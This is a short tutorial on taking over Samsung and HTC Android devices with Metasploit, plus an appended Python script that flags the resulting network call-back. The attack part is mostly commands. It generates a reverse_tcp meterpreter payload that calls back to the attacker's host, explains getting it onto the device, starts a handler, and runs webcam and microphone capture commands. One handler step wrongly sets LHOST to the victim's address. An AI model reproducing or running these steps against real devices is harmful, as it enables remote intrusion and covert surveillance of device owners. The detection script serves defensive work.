Exploiting Android with Metasploit

This article shows how an Android device can be compromised using Metasploit. The devices used are a Samsung S 8.4 tablet and an HTC M8 One smart phone, and the attacker uses a reverse TCP connection to make a call-back to the attacking host. In this case the attacking host is at 192.168.0.24, and the Android devices are at 192.168.0.9 (Samsung) and 192.168.0.10 (HTC M8).

Creating the Vulnerability

The vulnerability will create a call-back from the Android device to Metasploit. So if the attacking host is at 192.168.0.24, and we call back on port 443, then we create the exploit with:

    msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.24 LPORT=443

Next we would save this to a shared folder (such as on Dropbox) and then install it on the device, otherwise it could be downloaded over the Internet.

Using Metasploit

Once the exploit is on the device, we can use Metasploit to compromise it. To start the Metasploit console from Kali we run:

    msfconsole

and then set up a handler for the exploit:

    msf> use exploit/multi/handler

Next we define the payload for the exploit:

    msf exploit> set payload android/meterpreter/reverse_tcp

Finally we set the host connection details with the Samsung device with:

    msf exploit (handler) > set LHOST 192.168.0.9
    msf exploit (handler) > set LPORT 443
    msf exploit (handler) > exploit

This then waits for a connection to the device, and once connected, Metasploit has a connection into the Android device:
Android and Metasploit from Bill Buchanan on Vimeo.

The commands used are then:

    meterpreter > webcam_list
    1 - Back Camera
    2 - Front Camera
    meterpreter > webcam_snap 1
    meterpreter > webcam_stream 1
    meterpreter > record_mic -d 5

Conclusions

This article shows how an intruder can gain access to an Android device remotely, once an exploit has been installed.
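
On the network, the call-back described above appears as an Android device opening a TCP connection to port 443 on another host on the same LAN rather than to a public web server. The following detection sketch is an added example, not part of the original article: the flow-record format, the sample records and the server allowlist are constructed assumptions, and only the device and attacking-host addresses come from the article.

```python
import ipaddress

# Android device addresses, taken from the article.
MOBILE_DEVICES = {ipaddress.ip_address(a) for a in ("192.168.0.9", "192.168.0.10")}
# Assumed inventory of internal hosts that legitimately serve clients (hypothetical).
KNOWN_INTERNAL_SERVERS = {ipaddress.ip_address("192.168.0.1")}

# Constructed flow records: timestamp src_ip src_port dst_ip dst_port proto
SAMPLE_FLOWS = """\
2024-01-01T10:00:01Z 192.168.0.9 41822 142.250.180.14 443 tcp
2024-01-01T10:00:05Z 192.168.0.9 41830 192.168.0.24 443 tcp
2024-01-01T10:00:09Z 192.168.0.10 50112 192.168.0.1 443 tcp
2024-01-01T10:00:12Z 192.168.0.10 50120 192.168.0.24 443 tcp
2024-01-01T10:00:15Z 192.168.0.30 50500 192.168.0.24 443 tcp
malformed line
"""

def parse_flow(line):
    """Return a flow dict, or None if the line is not a well-formed record."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, src, _sport, dst, dport, proto = parts
    try:
        return {"ts": ts, "src": ipaddress.ip_address(src),
                "dst": ipaddress.ip_address(dst), "dport": int(dport),
                "proto": proto}
    except ValueError:
        return None

def suspicious_callbacks(text):
    """Flag TCP flows from a mobile device to an unlisted host on the local network."""
    alerts = []
    for line in text.splitlines():
        flow = parse_flow(line)
        if flow is None or flow["proto"] != "tcp":
            continue
        if flow["src"] not in MOBILE_DEVICES:
            continue
        # Ordinary HTTPS from a handset goes to public addresses or known servers;
        # a private, unlisted peer is the pattern the article's call-back produces.
        if flow["dst"].is_private and flow["dst"] not in KNOWN_INTERNAL_SERVERS:
            alerts.append((flow["ts"], str(flow["src"]), str(flow["dst"]), flow["dport"]))
    return alerts

if __name__ == "__main__":
    for alert in suspicious_callbacks(SAMPLE_FLOWS):
        print("ALERT mobile device -> unlisted internal host:", alert)
```

Because the check keys on the destination being a private, unlisted address rather than on the port number, it still fires if the call-back port is changed from 443.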